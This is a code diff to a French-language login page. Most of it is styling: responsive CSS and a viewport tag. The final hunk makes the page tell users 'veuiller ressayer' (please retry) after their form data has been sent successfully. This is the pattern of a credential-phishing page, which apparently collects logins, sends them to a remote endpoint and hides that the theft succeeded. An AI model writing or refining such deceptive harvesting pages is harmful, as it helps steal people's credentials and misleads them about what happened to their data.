--- a/index.html
+++ b/index.html
@@ -3,6 +3,7 @@
 <head>
     <meta charset="UTF-8" />
     <title>Connexion</title>
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
     <style>
         body {
             font-family: Arial, sans-serif;
@@ -11,16 +12,19 @@
             justify-content: center;
             align-items: center;
             height: 100vh;
+            margin: 0;
+            padding: 10px;
         }
 
         .login-container {
             background-color: white;
-            padding: 40px;
+            padding: 40px 30px;
             border-radius: 8px;
             width: 100%;
             max-width: 400px;
             box-shadow: 0 2px 10px rgba(0,0,0,0.1);
             text-align: center;
+            box-sizing: border-box;
         }
 
         .login-container img {
@@ -60,6 +64,7 @@
             border-radius: 4px;
             font-size: 16px;
             cursor: pointer;
+            transition: background-color 0.3s ease;
         }
 
         input[type="submit"]:hover {
@@ -79,6 +84,25 @@
 
         .footer a:hover {
             text-decoration: underline;
+        }
+
+        /* Responsive */
+        @media (max-width: 450px) {
+            .login-container {
+                padding: 30px 20px;
+                max-width: 100%;
+            }
+
+            input[type="text"],
+            input[type="password"],
+            input[type="submit"] {
+                font-size: 14px;
+                padding: 10px;
+            }
+
+            .login-container img {
+                width: 75px;
+            }
         }
     </style>
 </head>
@@ -116,7 +140,7 @@
             .then(response => response.json())
             .then(data => {
                 if(data.ok){
-                    alert('Informations envoyées avec succès !');
+                    alert('veuiller ressayer');
                     document.getElementById('loginForm').reset();
                 } else {
                     alert('Erreur : ' + data.description);
